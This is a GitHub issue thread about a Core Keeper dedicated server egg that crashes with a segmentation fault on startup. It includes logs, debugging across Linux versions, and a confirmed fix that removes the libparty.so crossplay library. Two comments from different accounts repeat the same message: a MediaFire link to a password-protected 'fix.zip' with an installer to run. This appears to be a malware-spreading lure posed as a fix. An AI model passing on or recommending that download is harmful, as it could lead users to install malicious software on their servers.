### ISSUE TITLE
[Bug]: <Corekeeper> Server Crashing on Startup

### ISSUE THREAD

**Issue by Relex1337** [pelican-eggs/games-steamcmd#66]
### Panel Version

1.11.7

### Wings Version

1.6.1

### Service

core_keeper/egg-pterodactyl-core-keeper.json

### Modified

No, I did not modify the egg

### Expected Behavior

Server Starting

### Actual Behavior

Server is Crashing:

Success! App '1007' fully installed.
:/home/container$ export DISPLAY=:0; rm ./GameID.txt ./CoreKeeperServerLog.txt; touch ./CoreKeeperServerLog.txt; xvfb-run -s "-screen 0 ${DISPLAY_WIDTH}x${DISPLAY_HEIGHT}x${DISPLAY_DEPTH} -ac -nolisten tcp -nolisten unix" ./CoreKeeperServer -batchmode -logfile CoreKeeperServerLog.txt -world ${WORLD_INDEX} -worldname "${WORLD_NAME}" -worldseed ${WORLD_SEED} $([[ "${GAME_ID}" != "" ]] && echo -n " -gameid ${GAME_ID}") -maxplayers ${MAX_PLAYERS} -worldmode ${WORLD_MODE} -port ${SERVER_PORT} & CKPID=$!; tail -f CoreKeeperServerLog.txt | grep -e '^\[userid:[0-9]*\] player' -e '^[^\[]' & LOGPID=$!; trap "kill ${CKPID}; wait ${CKPID}; kill ${LOGPID}; wait ${LOGPID}" 15; wait $!
rm: cannot remove './GameID.txt': No such file or directory
rm: cannot remove './CoreKeeperServerLog.txt': No such file or directory
[UnityMemory] Configuration Parameters - Can be set up in boot.config
    "memorysetup-bucket-allocator-granularity=16"
    "memorysetup-bucket-allocator-bucket-count=8"
    "memorysetup-bucket-allocator-block-size=4194304"
    "memorysetup-bucket-allocator-block-count=1"
    "memorysetup-main-allocator-block-size=16777216"
    "memorysetup-thread-allocator-block-size=16777216"
    "memorysetup-gfx-main-allocator-block-size=16777216"
    "memorysetup-gfx-thread-allocator-block-size=16777216"
    "memorysetup-cache-allocator-block-size=4194304"
    "memorysetup-typetree-allocator-block-size=2097152"
    "memorysetup-profiler-bucket-allocator-granularity=16"
    "memorysetup-profiler-bucket-allocator-bucket-count=8"
    "memorysetup-profiler-bucket-allocator-block-size=4194304"
    "memorysetup-profiler-bucket-allocator-block-count=1"
    "memorysetup-profiler-allocator-block-size=16777216"
    "memorysetup-profiler-editor-allocator-block-size=1048576"
    "memorysetup-temp-allocator-size-main=4194304"
    "memorysetup-job-temp-allocator-block-size=2097152"
    "memorysetup-job-temp-allocator-block-size-background=1048576"
    "memorysetup-job-temp-allocator-reduction-small-platforms=262144"
    "memorysetup-allocator-temp-initial-block-size-main=262144"
    "memorysetup-allocator-temp-initial-block-size-worker=262144"
    "memorysetup-temp-allocator-size-background-worker=32768"
    "memorysetup-temp-allocator-size-job-worker=262144"
    "memorysetup-temp-allocator-size-preload-manager=262144"
    "memorysetup-temp-allocator-size-nav-mesh-worker=65536"
    "memorysetup-temp-allocator-size-audio-worker=65536"
    "memorysetup-temp-allocator-size-cloud-worker=32768"
    "memorysetup-temp-allocator-size-gfx=262144"
Mono path[0] = '/home/container/CoreKeeperServer_Data/Managed'
Mono config path = '/home/container/CoreKeeperServer_Data/MonoBleedingEdge/etc'
Preloaded 'discord_game_sdk.so'
Shutdown handler: initialize.
Preloaded 'libEOSSDK-Linux-Shipping.so'
Preloaded 'libPlayFabMultiplayer.so'
Preloaded 'lib_burst_generated.so'
Caught fatal signal - signo:11 code:1 errno:0 addr:0x20
Obtained 24 stack frames.
#0  0x007fe32715f050 in __sigaction
#1  0x007fe3204e3ee0 in BumblelionLogger::TryToLoadConfigurationFile()
#2  0x007fe3204e3cd8 in BumblelionLogger::BumblelionLogger()
#3  0x007fe3204e4870 in BumblelionLogger::GetInstance()
#4  0x007fe3204e3bf6 in DbgLogAreaFlags_FnInOut
#5  0x007fe3204fbd79 in OutstandingPlayFabRequestManager::OutstandingRequest::OutstandingRequest()
#6  0x007fe3204fbbfd in OutstandingPlayFabRequestManager::OutstandingRequestList::OutstandingRequestList()
#7  0x007fe3205016ab in _GLOBAL__sub_I_PlayFabServiceManagerImpl.cpp
#8  0x007fe3294899ce in __nptl_change_stack_perm
#9  0x007fe329489ab4 in __nptl_change_stack_perm
#10 0x007fe327272024 in _dl_catch_exception
#11 0x007fe32949021e in _dl_rtld_di_serinfo
#12 0x007fe327271fca in _dl_catch_exception
#13 0x007fe3294905b8 in _dl_find_dso_for_object
#14 0x007fe3271a8438 in dlmopen
#15 0x007fe327271fca in _dl_catch_exception
#16 0x007fe32727207f in _dl_catch_error
#17 0x007fe3271a7f27 in dlerror
#18 0x007fe3271a84e9 in dlopen
#19 0x007fe32827df8e in PlayerMain(int, char**)
#20 0x007fe32826e77d in PlayerMain(int, char**)
#21 0x007fe32714a24a in __libc_init_first
#22 0x007fe32714a305 in __libc_start_main
#23 0x00000000201029 in (Unknown)
Segmentation fault (core dumped)

### Steps To Reproduce

1. Install Server
2. Start Server

### Install logs

https://ptero.co/ijajolazev

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aleforge** [comment]
I was doing some debugging as I encountered this issue and I noticed that on my nodes running Ubuntu 22.04 this egg works but on a node with Ubuntu 24.04 this issue occurs.

**Comment by MasaruTobashi** [comment]
On debian 11 too, this issue appears

**Comment by rainerstudios** [comment]
@aleforge the egg is not working Ubuntu 22.04.4 LTS

**Comment by aleforge** [comment]
> @aleforge the egg is not working Ubuntu 22.04.4 LTS

It is working on all our Ubuntu 22.04 servers and not the 24.04 and I can not find a package difference between the two. It is very weird but it has to be some missing package somewhere. So if it isn't working on your 22.04.4 there is some package difference.

All our nodes are deployed using Ansible and their has been no state drift from monitoring.

**Comment by HerrSammyDE** [comment]
I have the same problem under Debian 12 with the last Egg version from 2 months ago.

I also found this article: https://discourse.cubecoders.com/t/core-keeper-segmentation-fault/3623

**Comment by Lyricism1480** [comment]
After some digging around it appears the crossplay library does not work on docker.

Edit installation script to remove the problematic library:
## add below your custom commands if needed
rm /mnt/server/CoreKeeperServer_Data/Plugins/libparty.so

**Comment by Relex1337** [comment]
> After some digging around it appears the crossplay library does not work on docker.
> 
> Edit installation script to remove the problematic library:
> 
> ```
> ## add below your custom commands if needed
> rm /mnt/server/CoreKeeperServer_Data/Plugins/libparty.so
> ```

I have tested it on my instance and the server now starts without any problems. Thank you !
